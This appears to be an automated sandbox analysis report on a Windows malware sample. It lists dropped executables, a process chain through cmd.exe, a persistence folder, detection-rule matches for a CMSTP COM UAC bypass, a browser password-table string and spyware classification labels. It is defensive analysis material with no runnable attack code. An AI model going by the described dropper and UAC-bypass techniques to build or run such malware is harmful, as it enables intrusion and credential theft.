Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B2730	3_2_6C3B2730
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B2330	3_2_6C3B2330
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B1770	3_2_6C3B1770
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3AD760	3_2_6C3AD760
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000BFFC	8_2_000000014000BFFC
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001D000	8_2_000000014001D000
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140001424	8_2_0000000140001424
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000B824	8_2_000000014000B824
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014002F838	8_2_000000014002F838
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140008C3C	8_2_0000000140008C3C
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000D848	8_2_000000014000D848
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140005450	8_2_0000000140005450
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000D458	8_2_000000014000D458
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140021068	8_2_0000000140021068
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001048C	8_2_000000014001048C
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000909C	8_2_000000014000909C
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_00000001400EE4C4	8_2_00000001400EE4C4
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_00000001400238F8	8_2_00000001400238F8
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001A9B8	8_2_000000014001A9B8
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_00000001400041C8	8_2_00000001400041C8
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_00000001400231CC	8_2_00000001400231CC
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000A5E0	8_2_000000014000A5E0
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140021A00	8_2_0000000140021A00
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000E214	8_2_000000014000E214
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140022E30	8_2_0000000140022E30
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140024A78	8_2_0000000140024A78
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014002267C	8_2_000000014002267C
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001AE88	8_2_000000014001AE88
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001F2A4	8_2_000000014001F2A4
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140011EF4	8_2_0000000140011EF4
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001DF44	8_2_000000014001DF44
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140040F48	8_2_0000000140040F48
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014000A378	8_2_000000014000A378
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140013390	8_2_0000000140013390
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140018790	8_2_0000000140018790
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140020BB8	8_2_0000000140020BB8
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C452860	9_2_6C452860
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C45D400	9_2_6C45D400
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C45D4E0	9_2_6C45D4E0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C44DD30	9_2_6C44DD30
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C44E530	9_2_6C44E530
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C4551C0	9_2_6C4551C0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C454A40	9_2_6C454A40
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C451E50	9_2_6C451E50
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C44E610	9_2_6C44E610
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C4532C0	9_2_6C4532C0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C454AD0	9_2_6C454AD0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C453AB0	9_2_6C453AB0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C44D760	9_2_6C44D760
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C451770	9_2_6C451770
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C452730	9_2_6C452730
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 9_2_6C452330	9_2_6C452330
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE6D760	15_2_6BE6D760
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE71770	15_2_6BE71770
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE72730	15_2_6BE72730
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE72330	15_2_6BE72330
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE732C0	15_2_6BE732C0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE74AD0	15_2_6BE74AD0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE73AB0	15_2_6BE73AB0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE74A40	15_2_6BE74A40
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE71E50	15_2_6BE71E50
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE6E610	15_2_6BE6E610
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE751C0	15_2_6BE751C0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE6DD30	15_2_6BE6DD30
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE6E530	15_2_6BE6E530
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE7D4E0	15_2_6BE7D4E0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE72860	15_2_6BE72860
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BFCD420	15_2_6BFCD420
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 15_2_6BE7D400	15_2_6BE7D400

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: String function: 0040243B appears 37 times

Source: hv.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: apollo a88k COFF executable
Source: hv.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: apollo a88k COFF executable
Source: Localdockerv3.exe.4.dr	Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: hv.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: yhg.4.dr	Static PE information: Number of sections : 12 > 10
Source: hv.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: cvnmq.16.dr	Static PE information: Number of sections : 12 > 10

Source: 9mauyKC3JW.exe, 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 9mauyKC3JW.exe
Source: 9mauyKC3JW.exe, 00000000.00000003.1446329500.0000000002650000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepdfium.dll. vs 9mauyKC3JW.exe
Source: 9mauyKC3JW.exe, 00000000.00000003.1424529137.000000000092D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 9mauyKC3JW.exe
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepdfium.dll. vs 9mauyKC3JW.exe

Source: 9mauyKC3JW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.spyw.expl.evad.winEXE@20/23@1/1

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00407776

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

0_2_0040118A

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004034C1

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401BDF

Source: C:\Users\user\AppData\Local\Temp\hv.exe

File created: C:\Users\user\AppData\Roaming\Chromewizard

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

File created: C:\Users\user\AppData\Local\Temp\quwq

Jump to behavior

Source: 9mauyKC3JW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Localdockerv3.exe, 00000008.00000003.1975159475.0000000000AC6000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9mauyKC3JW.exe	Virustotal: Detection: 29%
Source: 9mauyKC3JW.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

File read: C:\Users\user\Desktop\9mauyKC3JW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9mauyKC3JW.exe "C:\Users\user\Desktop\9mauyKC3JW.exe"
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Process created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe"
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Process created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
